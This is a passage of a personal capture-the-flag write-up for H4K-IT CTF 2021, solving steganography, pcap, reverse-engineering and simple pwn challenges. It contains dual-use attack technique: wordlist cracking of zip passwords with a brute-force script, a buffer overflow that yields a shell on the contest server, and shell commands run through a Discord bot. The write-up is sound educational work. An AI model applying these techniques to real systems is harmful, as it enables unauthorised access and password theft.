# H4K-IT CTF 2021  This was a pretty fun CTF with challs made by my buddybuddy <a href="https://twitter.com/tahaafarooq">tahaa</a>. I got first place.  Solved most of these challs first, but it didn't count coz you didn't get extra points for first blood. I really enjoyed every bit of it because i learnt a lot in the long run and i'm sure that's every participants' feeling.  ## MISC CHALLS ### **First chall: welcome** ``` Go to our discord server:) Welcome:) ``` This was pretty easy. Went to the rules-prizes channel on their discord, and found the flag as a title.  ### **Second chall: blind** ``` I guess we have to seperate things to see things clearly ``` We're given a jpg file called blind.jpg. Running binwalk on it, i don't see interesting metadata. ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/blind_COMPLETE] └─$ binwalk blind.jpg DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 JPEG image data, JFIF standard 1.01 ``` And when i see such that don't have some sort of compression, i opt to use stegseek. Please don't use stegcracker and stegbrute. We're past that xD. |password|Line|Stegseek|Stegcracker|Stegbrute| |--------|----|--------|-----------|---------| |"cassandra"|1000|0.05s|3.1s|0.7s| |"kupal"|10000|0.05s|14.4s|7.1s| |"sagar"|100000|0.09s|2m23.0s|1m21.9s| |"budakid1"|1000000|0.73s|[p] 23m50.0s|13m45.7s| It's extremely fast!! ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/blind_COMPLETE] └─$ stegseek blind.jpg /usr/share/wordlists/rockyou.txt StegSeek 0.6 - https://github.com/RickdeJager/StegSeek [i] Found passphrase: "" [i] Original filename: "flag.zip". [i] Extracting to "blind.jpg.out". ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/blind_COMPLETE] └─$ mv blind.jpg.out flag.zip ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/blind_COMPLETE] └─$ file flag.zip flag.zip: Zip archive data, at least v5.1 to extract ``` Running that, got a zipfile. But there's just one problem, it's password protected. ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/blind_COMPLETE] └─$ 7z e flag.zip 7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21 p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs Intel(R) Core(TM) i3-4005U CPU @ 1.70GHz (40651),ASM,AES-NI) Scanning the drive for archives: 1 file, 224 bytes (1 KiB) Extracting archive: flag.zip -- Path = flag.zip Type = zip Physical Size = 224 Enter password (will not be echoed): ERROR: Wrong password : flag.txt Sub items Errors: 1 Archives with Errors: 1 Sub items Errors: 1 ``` I made a tool last year that was supposed to help me solve CTF challs automatically. I integrated a few neat functions in it like czip which i will use for this challenge. czip is a function that cracks password protected zipfiles by passing the zipfile to zip2john to get its hash and then cracks that hash using a wordlist. It can also crack zipfiles recursively like when there's a zipfile within a zipfile. ```bash= mug3njutsu🧑‍💻⛩ ~> czip Using default input encoding: UTF-8 Will run 4 OpenMP threads Press Ctrl-C to abort, or send SIGUSR1 to john process for status 1g 0:00:00:00 DONE (2022-04-05 21:10) 1.408g/s 11538p/s 11538c/s 11538C/s 123456..total90 Use the "--show" option to display all of the cracked passwords reliably Session completed. 7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21 p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs Intel(R) Core(TM) i3-4005U CPU @ 1.70GHz (40651),ASM,AES-NI) Scanning the drive for archives: 1 file, 224 bytes (1 KiB) Extracting archive: flag.zip -- Path = flag.zip Type = zip Physical Size = 224 Everything is Ok Size: 32 Compressed: 224 a.sh flag.txt hash pass mug3njutsu🧑‍💻⛩ ~> !cat flag.txt h4k-it{wattt_t00k_yOU_s0LonGG!} ``` And, got the flag. Easy enough. An alternative is to use a simple bash script i made that is also quite fast. ```bash= #!/bin/bash # @author: mug3njutsu file="/usr/share/wordlists/rockyou.txt" while IFS= read -r pass; do 7z e flag.zip -p$pass if [[ $? -eq 0 ]]; then cat flag.txt exit else rm flag.txt continue fi done <"$file" ``` ```bash= h4k-it{wattt_t00k_yOU_s0LonGG!} real 0.26s user 0.15s sys 0.11s cpu 101% ``` Cracks in 0.26 seconds. ### **Third chall: cookie** ```bash= Can you feed this program ? nc 20.124.30.27 9001 ``` We're given a binary and a server to connect to. Running the binary -> ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/cookie_COMPLETE] └─$ ./cookie Feed me cookie : mug3njutsu No cookie for me! ``` We're asked to feed a cookie. And when you pass a string it breaks out saying there's no cookie. Since i was playing this contest competitively, i didn't do a static analysis of the binary, but i assumed that it must be a bufferoverflow coz of the keyword feed. ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/cookie_COMPLETE] └─$ ./cookie Feed me cookie : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA No cookie for me! $ ls cookie flag.txt ``` After passing a bunch of A's we break into a shell. Let's now do this remotely. ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/cookie_COMPLETE] └─$ nc 20.124.30.27 9001 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ls bin cookie dev flag.txt lib lib32 lib64 cat flag.txt h4k-it{b0f_0N_st4ck_sucKKs} ``` Got the flag. Easy as done. ### **Fourth chall: sn1ff** ``` DONT SNIFF TOO MUCH !! ``` We're given a pcap file. The first thing i always do is to run strings. Like i said, i was competing for first blood. ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/sniff_COMPLETE] └─$ strings sn1ff.pcapng | grep -oE "h4k-it{.*?}" h4k-it{thats_n0tt_a_w44yy_t0_SECURE_PACKETS} ``` Too easy. ### **Fifth chall: Addition** ``` You really want the flag? nc 20.124.30.27 9002 ``` When we connect to the server, we're asked to play some sort of game where we are supposed to give the answer to an addition question. I really like these type of challs. I did a similar one for the CyberApocalypse CTF for HackTheBox. <a href="https://hackmd.io/@codaholikid/cyberapocalypse-ctf-2021#First-Challenge-Alien-Camp">Alien Camp</a> What's interesting about this chall is that, the answers to the additions are actually ascii encoded characters for the flag. I made a simple python script that was going to answer all the questions until the program breaks and then at the same time print the ascii chars. ```python= #!/usr/bin/python3 # @author: mug3njutsu from pwn import * host = "20.124.30.27" port = 9002 r = remote(host, port) data = r.recv()+r.recv().split(b"\n")[0] data2 = data.split(b"\n")[1].decode() answer = str(eval(data2)) char = f"{answer}" r.sendline(answer.encode('utf-8')) while 1: question = r.recv().split(b"\n")[0].decode() answer = str(eval(question)) char += f",{answer}" print(char) r.sendline(answer.encode('utf-8')) ``` Running this; ```bash= 104,52,107,45,105,116,123,73,95,100,48,117,98,98,116,51,100,95,121,48,117,95,99,48,117,76,68,95,115,51,51,95,77,69,69,125 ``` Got a set of ascii chars. I then used another python script to decode them and get the flag. ```python= #!/usr/bin/python3 # @author: mug3njutsu chars = [104,52,107,45,105,116,123,73,95,100,48,117,98,98,116,51,100,95,121,48,117,95,99,48,117,76,68,95,115,51,51,95,77,69,69,125] flag = "".join(map(chr, chars)) print(flag) ``` Running this; ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/addition_COMPLETE] └─$ python3 a.py h4k-it{I_d0ubbt3d_y0u_c0uLD_s33_MEE} ``` Solved. ### **Sixth chall: H4K-IT MOD** ``` Have you joined our discord server?? Welcome to the party , your not late! ``` This chall is hilarous. So, there is a bot on the discord server and the mission is to provoke her to give you the flag lol! Yes, her.  When you run $help, you get a list of options. ``` $vote ---> vote for user $hint ---> get a hint! $help ---> display this message ``` When you run $vote it says -> Voting Time is up. When you run $hint, hehe, here's where the fun is. It asks -> do you know the prefix added with id? The idea was to interact with the bot as if you had a shell, difference is to add $ as a prefix. Running $id -> ``` Why are you requesting this in public btw? ['uid=1000(runner) gid=1000(runner) groups=1000(runner)\n', '\n', '\n', '# hidden command $shell'] ``` Nice. We have some sort of shell now and can see a hidden command $shell. This is supposed to allow us to run commands on the shell. Listing the files with $shell ls -> ``` ['flag.txt\n', 'id.txt\n', 'main.py\n', 'poetry.lock\n', 'pyproject.toml\n', 'tmp.txt\n'] ``` There's a flag.txt!! Let's cat that file to get flag with $shell cat flag.txt -> ``` ['h4k-it{d1sc0rd_B0t5_w1tth_SHELL_ACCSS}'] ``` Smooth. ## RE CHALLS ### **First chall: infantre** ``` Let's Start With The Basics ``` We're given a binary to reverse and since this should be a basic chall, good old strings will do just fine. ```bash= h4k-it{tH his_1s_pH r0b4bly_H th3_eaS5H iesT_chaH ll3ng4!} ``` Simple. ### **Second chall: babyre** ``` Wow this baby can perform additions!! flag format : h4k-it{numbers} ``` We're given a binary. Strings won't help you here. I like using radare for static analysis. ``` ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/babyre_COMPLETE] └─$ r2 -A babyre Warning: run r2 with -e io.cache=true to fix relocations in disassembly [x] Analyze all flags starting with sym. and entry0 (aa) [x] Analyze function calls (aac) [x] Analyze len bytes of instructions for references (aar) [x] Check for vtables [x] Type matching analysis for all functions (aaft) [x] Propagate noreturn information [x] Use -AA or aaaa to perform additional experimental analysis. [0x00001060]> afl 0x00001060 1 42 entry0 0x00001090 4 41 -> 34 sym.deregister_tm_clones 0x000010c0 4 57 -> 51 sym.register_tm_clones 0x00001100 5 57 -> 50 sym.__do_global_dtors_aux 0x00001050 1 6 sym.imp.__cxa_finalize 0x00001140 1 5 entry.init0 0x00001000 3 23 sym._init 0x00001230 1 1 sym.__libc_csu_fini 0x00001234 1 9 sym._fini 0x000011d0 4 93 sym.__libc_csu_init 0x00001145 4 139 main 0x00001030 1 6 sym.imp.puts 0x00001040 1 6 sym.imp.__isoc99_scanf ``` We can see a few functions. Let's look at main. ``` 0x0000114d c745fce80300. mov dword [var_4h], 0x3e8 │ 0x00001154 c745f82c0100. mov dword [var_8h], 0x12c │ 0x0000115b c745f41e0000. mov dword [var_ch], 0x1e │ 0x00001162 488d3d9f0e00. lea rdi, str.Enter_the_secret_number_:_ ; 0x2008 ; "Enter the secret number : " ; const char *s │ 0x00001169 e8c2feffff call sym.imp.puts ; int puts(const char *s) │ 0x0000116e 488d45ec lea rax, [var_14h] │ 0x00001172 4889c6 mov rsi, rax │ 0x00001175 488d3da70e00. lea rdi, [0x00002023] ; "%d" ; const char *format │ 0x0000117c b800000000 mov eax, 0 │ 0x00001181 e8bafeffff call sym.imp.__isoc99_scanf ; int scanf(const char *format) │ 0x00001186 8b45ec mov eax, dword [var_14h] │ 0x00001189 83f807 cmp eax, 7 │ ┌─< 0x0000118c 752f jne 0x11bd │ │ 0x0000118e 488d3d910e00. lea rdi, str.Lucky_but_not_enough_ ; 0x2026 ; "Lucky but not enough!" ; const char *s │ │ 0x00001195 e896feffff call sym.imp.puts ; int puts(const char *s) │ │ 0x0000119a 488d3d9f0e00. lea rdi, str.Find_your_way_in__I_wont_help_you_ ; 0x2040 ; "Find your way in, I won't help you!" ; const char *s │ │ 0x000011a1 e88afeffff call sym.imp.puts ; int puts(const char *s) │ │ 0x000011a6 8b55fc mov edx, dword [var_4h] │ │ 0x000011a9 8b45f8 mov eax, dword [var_8h] │ │ 0x000011ac 01c2 add edx, eax │ │ 0x000011ae 8b45f4 mov eax, dword [var_ch] │ │ 0x000011b1 01c2 add edx, eax │ │ 0x000011b3 8b45ec mov eax, dword [var_14h] │ │ 0x000011b6 01d0 add eax, edx │ │ 0x000011b8 8945f0 mov dword [var_10h], eax ``` We can see 3 variables which are hex bytes. Then at this point, the program asks you to Enter the secret number. Then if you enter 7, it says "Lucky but not enough" and "Find your way in I wont help you". ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/babyre_COMPLETE] └─$ ./babyre Enter the secret number : 7 Lucky but not enough! Find your way in, I won't help you! ``` Then at this point it will move 0x3e8 to edx and 0x12c to eax. Then it will add eax to edx -> ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/babyre_COMPLETE] └─$ python3 Python 3.9.9 (main, Nov 16 2021, 10:24:31) [GCC 11.2.0] on linux Type "help", "copyright", "credits" or "license" for more information. >>> 0x3e8 + 0x12c 1300 ``` It will then move the value 0x1e to eax and add it to edx -> ```bash= >>> 1300 + 0x1e 1330 ``` Then it will move the value 0 to eax and compare it to 7. Then adds edx to this value -> ```bash= >>> 1330 + 7 1337 ``` And then moves eax to a variable which is the answer that the program is looking for. ### **Third chall: stockseg** ``` Segmentation Fault?? What does that even mean our programmers are so lazy!! ``` We're given a binary. Running radare -> ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/stockseg_COMPLETE] └─$ r2 -A stockseg Warning: run r2 with -e io.cache=true to fix relocations in disassembly [x] Analyze all flags starting with sym. and entry0 (aa) [x] Analyze function calls (aac) [x] Analyze len bytes of instructions for references (aar) [x] Check for vtables [x] Type matching analysis for all functions (aaft) [x] Propagate noreturn information [x] Use -AA or aaaa to perform additional experimental analysis. [0x00001070]> afl 0x00001070 1 42 entry0 0x000010a0 4 41 -> 34 sym.deregister_tm_clones 0x000010d0 4 57 -> 51 sym.register_tm_clones 0x00001110 5 57 -> 50 sym.__do_global_dtors_aux 0x00001060 1 6 sym.imp.__cxa_finalize 0x00001150 1 5 entry.init0 0x00001000 3 23 sym._init 0x00001450 1 1 sym.__libc_csu_fini 0x00001454 1 9 sym._fini 0x000012b7 1 304 sym.stock_flag 0x00001040 1 6 sym.imp.printf 0x000011b2 12 261 sym.stock_pile 0x000013f0 4 93 sym.__libc_csu_init 0x00001155 4 93 main 0x00001030 1 6 sym.imp.puts 0x00001050 1 6 sym.imp.__isoc99_scanf ``` There's a main function. But then, the sym.stock_flag function has the largest number of bytes. Looking at it -> ```bash= │ 0x000012c2 c745e0680000. mov dword [var_20h], 0x68 ; 'h' │ 0x000012c9 c745e4340000. mov dword [var_1ch], 0x34 ; '4' │ 0x000012d0 c745e86b0000. mov dword [var_18h], 0x6b ; 'k' │ 0x000012d7 c745ec2d0000. mov dword [var_14h], 0x2d ; '-' │ 0x000012de c745f0690000. mov dword [var_10h], 0x69 ; 'i' │ 0x000012e5 c745f4740000. mov dword [var_ch], 0x74 ; 't' │ 0x000012ec c745f87b0000. mov dword [var_8h], 0x7b ; '{' │ 0x000012f3 c745fc680000. mov dword [var_4h], 0x68 ; 'h' │ 0x000012fa c745c0310000. mov dword [var_40h], 0x31 ; '1' │ 0x00001301 c745c4640000. mov dword [var_3ch], 0x64 ; 'd' │ 0x00001308 c745c8640000. mov dword [var_38h], 0x64 ; 'd' │ 0x0000130f c745cc330000. mov dword [var_34h], 0x33 ; '3' │ 0x00001316 c745d06e0000. mov dword [var_30h], 0x6e ; 'n' │ 0x0000131d c745d45f0000. mov dword [var_2ch], 0x5f ; '_' │ 0x00001324 c745d8660000. mov dword [var_28h], 0x66 ; 'f' │ 0x0000132b c745dc750000. mov dword [var_24h], 0x75 ; 'u' │ 0x00001332 c745906e0000. mov dword [var_70h], 0x6e ; 'n' │ 0x00001339 c74594430000. mov dword [var_6ch], 0x43 ; 'C' │ 0x00001340 c74598740000. mov dword [var_68h], 0x74 ; 't' │ 0x00001347 c7459c690000. mov dword [var_64h], 0x69 ; 'i' │ 0x0000134e c745a0300000. mov dword [var_60h], 0x30 ; '0' │ 0x00001355 c745a4300000. mov dword [var_5ch], 0x30 ; '0' │ 0x0000135c c745a86e0000. mov dword [var_58h], 0x6e ; 'n' │ 0x00001363 c745ac5f0000. mov dword [var_54h], 0x5f ; '_' │ 0x0000136a c745b0440000. mov dword [var_50h], 0x44 ; 'D' │ 0x00001371 c78560ffffff. mov dword [var_a0h], 0x31 ; '1' │ 0x0000137b c78564ffffff. mov dword [var_9ch], 0x73 ; 's' │ 0x00001385 c78568ffffff. mov dword [var_98h], 0x63 ; 'c' │ 0x0000138f c7856cffffff. mov dword [var_94h], 0x30 ; '0' │ 0x00001399 c78570ffffff. mov dword [var_90h], 0x76 ; 'v' │ 0x000013a3 c78574ffffff. mov dword [var_8ch], 0x33 ; '3' │ 0x000013ad c78578ffffff. mov dword [var_88h], 0x72 ; 'r' │ 0x000013b7 c7857cffffff. mov dword [var_84h], 0x33 ; '3' │ 0x000013c1 c74580640000. mov dword [var_80h], 0x64 ; 'd' │ 0x000013c8 c745847d0000. mov dword [var_7ch], 0x7d ; '}' ``` You can see bits of the flag. I easily extracted the flag by placing this data in a file then using awk to grab only the field with flag bits and then replace the new lines with spaces. ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/stockseg_COMPLETE] └─$ cat strings | awk -F' ' '{print $9}' | tr '\n' ' ' 1 ⨯ '4' 'k' '-' 'i' 't' '{' 'h' '1' 'd' 'd' '3' 'n' '_' 'f' 'u' 'n' 'C' 't' 'i' '0' '0' 'n' '_' 'D' '1' 's' 'c' '0' 'v' '3' 'r' '3' 'd' '}' ``` Then i used made a python script to construct that string to the flag. ```python= #!/usr/bin/python3 # @author: mug3njutsu char = ['4' 'k' '-' 'i' 't' '{' 'h' '1' 'd' 'd' '3' 'n' '_' 'f' 'u' 'n' 'C' 't' 'i' '0' '0' 'n' '_' 'D' '1' 's' 'c' '0' 'v' '3' 'r' '3' 'd' '}'] flag = "".join(char) print(f"h{flag}") ``` ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/stockseg_COMPLETE] └─$ python3 a.py 130 ⨯ h4k-it{h1dd3n_funCti00n_D1sc0v3r3d} ``` Solved. ### **Fourth chall: strings** ``` Uff, Just check the Strings! ``` We're given a binary. I disassemble it using radare. ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/strings_COMPLETE] └─$ r2 -A strings Warning: run r2 with -e io.cache=true to fix relocations in disassembly [x] Analyze all flags starting with sym. and entry0 (aa) [x] Analyze function calls (aac) [x] Analyze len bytes of instructions for references (aar) [x] Check for vtables [x] Type matching analysis for all functions (aaft) [x] Propagate noreturn information [x] Use -AA or aaaa to perform additional experimental analysis. [0x00001070]> afl 0x00001070 1 42 entry0 0x000010a0 4 41 -> 34 sym.deregister_tm_clones 0x000010d0 4 57 -> 51 sym.register_tm_clones 0x00001110 5 57 -> 50 sym.__do_global_dtors_aux 0x00001060 1 6 sym.imp.__cxa_finalize 0x00001150 1 5 entry.init0 0x00001000 3 23 sym._init 0x00001350 1 1 sym.__libc_csu_fini 0x00001354 1 9 sym._fini 0x000012f0 4 93 sym.__libc_csu_init 0x00001155 4 95 main 0x000011b4 1 310 sym.stack 0x00001030 1 6 sym.imp.puts 0x00001040 1 6 sym.imp.printf 0x00001050 1 6 sym.imp.__isoc99_scanf ``` There's a main function but again, the sys.stack function has more bytes. Looking at it -> ```bash= │ 0x000011bf c745fc680000. mov dword [var_4h], 0x68 ; 'h' │ 0x000011c6 c745f8340000. mov dword [var_8h], 0x34 ; '4' │ 0x000011cd c745f46b0000. mov dword [var_ch], 0x6b ; 'k' │ 0x000011d4 c745f02d0000. mov dword [var_10h], 0x2d ; '-' │ 0x000011db c745ec690000. mov dword [var_14h], 0x69 ; 'i' │ 0x000011e2 c745e8740000. mov dword [var_18h], 0x74 ; 't' │ 0x000011e9 c745e47b0000. mov dword [var_1ch], 0x7b ; '{' │ 0x000011f0 c745e0730000. mov dword [var_20h], 0x73 ; 's' │ 0x000011f7 c745dc740000. mov dword [var_24h], 0x74 ; 't' │ 0x000011fe c745d8610000. mov dword [var_28h], 0x61 ; 'a' │ 0x00001205 c745d4630000. mov dword [var_2ch], 0x63 ; 'c' │ 0x0000120c c745d06b0000. mov dword [var_30h], 0x6b ; 'k' │ 0x00001213 c745cc650000. mov dword [var_34h], 0x65 ; 'e' │ 0x0000121a c745c85f0000. mov dword [var_38h], 0x5f ; '_' │ 0x00001221 c745c4730000. mov dword [var_3ch], 0x73 ; 's' │ 0x00001228 c745c0740000. mov dword [var_40h], 0x74 ; 't' │ 0x0000122f c745bc720000. mov dword [var_44h], 0x72 ; 'r' │ 0x00001236 c745b8690000. mov dword [var_48h], 0x69 ; 'i' │ 0x0000123d c745b46e0000. mov dword [var_4ch], 0x6e ; 'n' │ 0x00001244 c745b0670000. mov dword [var_50h], 0x67 ; 'g' │ 0x0000124b c745ac730000. mov dword [var_54h], 0x73 ; 's' │ 0x00001252 c745a85f0000. mov dword [var_58h], 0x5f ; '_' │ 0x00001259 c745a4610000. mov dword [var_5ch], 0x61 ; 'a' │ 0x00001260 c745a0720000. mov dword [var_60h], 0x72 ; 'r' │ 0x00001267 c7459c650000. mov dword [var_64h], 0x65 ; 'e' │ 0x0000126e c745985f0000. mov dword [var_68h], 0x5f ; '_' │ 0x00001275 c74594620000. mov dword [var_6ch], 0x62 ; 'b' │ 0x0000127c c74590650000. mov dword [var_70h], 0x65 ; 'e' │ 0x00001283 c7458c730000. mov dword [var_74h], 0x73 ; 's' │ 0x0000128a c74588740000. mov dword [var_78h], 0x74 ; 't' │ 0x00001291 c74584730000. mov dword [var_7ch], 0x73 ; 's' │ 0x00001298 c74580740000. mov dword [var_80h], 0x74 ; 't' │ 0x0000129f c7857cffffff. mov dword [var_84h], 0x72 ; 'r' │ 0x000012a9 c78578ffffff. mov dword [var_88h], 0x69 ; 'i' │ 0x000012b3 c78574ffffff. mov dword [var_8ch], 0x6e ; 'n' │ 0x000012bd c78570ffffff. mov dword [var_90h], 0x67 ; 'g' │ 0x000012c7 c7856cffffff. mov dword [var_94h], 0x73 ; 's' │ 0x000012d1 c78568ffffff. mov dword [var_98h], 0x7d ; '}' ``` Got the flag in bits just as in the last chall. Repeated the same process as in the last chall to get the flag. ```python= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/strings_COMPLETE] └─$ python3 a.py h4k-it{stacke_strings_are_beststrings} ``` Solved. ### **Fifth chall: get-leet** ``` This is the first version of our app, it has some bugs , i'll fix them soon, but i'm sure no is able to login, prove me wrong! https://anonfiles.com/v5QfbeW5ub/get-leet_apk ``` We're given an apk file. I solved this chall in 1 minute xD just by running the find command after decompiling the file using apktool. To decompile -> ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/get-leet_COMPLETE] └─$ apktool d get-leet.apk Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true I: Using Apktool 2.5.0-dirty on get-leet.apk I: Loading resource table... I: Decoding AndroidManifest.xml with resources... I: Loading resource table from file: /home/mug3njutsu/.local/share/apktool/framework/1.apk I: Regular manifest package... I: Decoding file-resources... I: Decoding values */* XMLs... I: Baksmaling classes.dex... I: Copying assets and libs... I: Copying unknown files... I: Copying original files... ``` A folder is created. ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/get-leet_COMPLETE/get-leet] └─$ ls AndroidManifest.xml apktool.yml original res smali ``` This where i ran the find command that will ideally run strings on each file in the directory and then grab the flag if any. ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/get-leet_COMPLETE/get-leet] └─$ find . -exec strings {} \; 2>/dev/null | grep -oE "h4k-it{.*?}" h4k-it{android_apk_r3ver5inG_1snT_th4t_b4d} ``` Solved. ### **Sixth chall: krypt0r** ``` This is known to be the fastest encryptor there is and of course a decryptor , I'm not really good with reverse engineering and all that , but I tried all I could the only thing I found was a weird call that wasn't called, I hope you can solve this! :| ``` We're given a binary. Looking at it with radare -> ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/krypt0r_COMPLETE] └─$ r2 -A krypt0r Warning: run r2 with -e io.cache=true to fix relocations in disassembly [x] Analyze all flags starting with sym. and entry0 (aa) [x] Analyze function calls (aac) [x] Analyze len bytes of instructions for references (aar) [x] Check for vtables [x] Type matching analysis for all functions (aaft) [x] Propagate noreturn information [x] Use -AA or aaaa to perform additional experimental analysis. [0x00001080]> afl 0x00001080 1 42 entry0 0x000010b0 4 41 -> 34 sym.deregister_tm_clones 0x000010e0 4 57 -> 51 sym.register_tm_clones 0x00001120 5 57 -> 50 sym.__do_global_dtors_aux 0x00001070 1 6 sym.imp.__cxa_finalize 0x00001160 1 5 entry.init0 0x00001000 3 23 sym._init 0x00001370 1 1 sym.__libc_csu_fini 0x000012a2 1 109 sym.fncfafafa 0x00001040 1 6 sym.imp.printf 0x00001030 1 6 sym.imp.puts 0x00001374 1 9 sym._fini 0x00001310 4 93 sym.__libc_csu_init 0x00001165 15 317 main 0x00001050 1 6 sym.imp.gets 0x00001060 1 6 sym.imp.__isoc99_scanf ``` This time, the main function has the largest number of bytes, so, i looked at that first. ```bash= │ 0x0000116d 488d3d940e00. lea rdi, str._n_KRYPTOR_V_1.0_::_AUTHOR_::_tahaafarooq ; 0x2008 ; "\n KRYPTOR V 1.0 :: AUTHOR :: tahaafarooq" ; const char *s │ 0x00001174 e8b7feffff call sym.imp.puts ; int puts(const char *s) │ 0x00001179 488d3db10e00. lea rdi, str._n_Please_enter_a_string_:__t ; 0x2031 ; "\n Please enter a string : \t" ; const char *format │ 0x00001180 b800000000 mov eax, 0 │ 0x00001185 e8b6feffff call sym.imp.printf ; int printf(const char *format) │ 0x0000118a 488d4590 lea rax, [s] │ 0x0000118e 4889c7 mov rdi, rax ; char *s │ 0x00001191 b800000000 mov eax, 0 │ 0x00001196 e8b5feffff call sym.imp.gets ; char *gets(char *s) │ 0x0000119b 488d3dae0e00. lea rdi, str._n_Choose_between_the_following_options:_ ; 0x2050 ; "\n Choose between the following options: " ; const char *s │ 0x000011a2 e889feffff call sym.imp.puts ; int puts(const char *s) │ 0x000011a7 488d3dcb0e00. lea rdi, str.1__Encrypt_the_string_ ; 0x2079 ; "1 = Encrypt the string " ; const char *s │ 0x000011ae e87dfeffff call sym.imp.puts ; int puts(const char *s) │ 0x000011b3 488d3dd70e00. lea rdi, str.2__Decrypt_the_string_ ; 0x2091 ; "2 = Decrypt the string " ; const char *s │ 0x000011ba e871feffff call sym.imp.puts ; int puts(const char *s) ``` Nothing too interesting here. Just shows how the binary works. It first prints `KRYPTOR V 1.0 :: AUTHOR :: tahaafarooq` and then asks for an input `Please enter a string :`. Then asks you to choose between two options `Choose between the following options:` either to encrypt or decrypt the string. Other than that, nothing else too interesting. Let's look at another function. The sym.fncfafafa function has a good number of bytes as the main function. Looking at it -> ``` │ 0x000012aa 48b86b376e30. movabs rax, 0x447e776c306e376b ; 'k7n0lw~D' │ 0x000012b4 48ba62697871. movabs rdx, 0x336c574671786962 ; 'bixqFWl3' │ 0x000012be 488945d0 mov qword [var_30h], rax │ 0x000012c2 488955d8 mov qword [var_28h], rdx │ 0x000012c6 48b851626c71. movabs rax, 0x36673476716c6251 ; 'Qblqv4g6' │ 0x000012d0 48ba36626462. movabs rdx, 0x4671786962646236 ; '6bdbixqF' │ 0x000012da 488945e0 mov qword [var_20h], rax │ 0x000012de 488955e8 mov qword [var_18h], rdx │ 0x000012e2 c745f0465757. mov dword [var_10h], 0x4c575746 ; 'FWWL' │ 0x000012e9 66c745f47271 mov word [var_ch], 0x7172 ; 'rq' ``` We can see some interesting strings. These are the strings that we're supposed to pass to the binary and decode to get the flag. ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/krypt0r_COMPLETE] └─$ ./krypt0r 127 ⨯ KRYPTOR V 1.0 :: AUTHOR :: tahaafarooq Please enter a string : k7n0lw~DbixqFWl3Qblqv4g66bdbixqFFWWLrq Choose between the following options: 1 = Encrypt the string 2 = Decrypt the string 2 Decrypted String: h4k-it{A_funCTi0N_ins1d33_a_funCCTTIon ``` Solved. ### **Seventh chall: panel** ``` At BlackTek Company , Our programmer has build a binary that allows administrators to login , so basically it's a login panel, but whenever I try to use it ....I can't get far it just throws a bunch of errors, Can you figure out what's really going on behind the binary? ``` We're given a binary. Disassembling it using radare -> ```bash= ┌──(mug3njutsu㉿Lenovo-Ideapad)-[~/ctf/h4k-it-2/panel_COMPLETE] └─$ r2 -A panel Warning: run r2 with -e io.cache=true to fix relocations in disassembly [x] Analyze all flags starting with sym. and entry0 (aa) [x] Analyze function calls (aac) [x] Analyze len bytes of instructions for references (aar) [x] Check for vtables [x] Type matching analysis for all functions (aaft) [x] Propagate noreturn information [x] Use -AA or aaaa to perform additional experimental analysis. [0x00001080]> afl 0x00001080 1 42 entry0 0x000010b0 4 41 -> 34 sym.deregister_tm_clones 0x000010e0 4 57 -> 51 sym.register_tm_clones 0x00001120 5 57 -> 50 sym.__do_global_dtors_aux 0x00001070 1 6 sym.imp.__cxa_finalize 0x00001160 1 5 entry.init0 0x00001000 3 23 sym._init 0x000012b0 1 1 sym.__libc_csu_fini 0x0000119c 4 87 sym.panel_login 0x000012b4 1 9 sym._fini 0x00001250 4 93 sym.__libc_csu_init 0x00001165 1 55 main 0x00001050 1 6 sym.imp.printf 0x000011f3 4 90 sym.flag 0x00001030 1 6 sym.imp.putchar 0x00001040 1 6 sym.imp.puts 0x00001060 1 6 sym.imp.gets ``` There's a main function. But there's also another interesting function sym.flag. Looking at that -> ```bash= │ 0x000011f3 55 push rbp │ 0x000011f4 4889e5 mov rbp, rsp │ 0x000011f7 4883ec20 sub rsp, 0x20 │ 0x000011fb 48b87a6c7677. movabs rax, 0x506f696f77766c7a ; 'zlvwoioP' │ 0x00001205 48ba657e7e5a. movabs rdx, 0x445f763a5a7e7e65 ; 'e~~Z:v_D' │ 0x0000120f 488945e0 mov qword [var_20h], rax │ 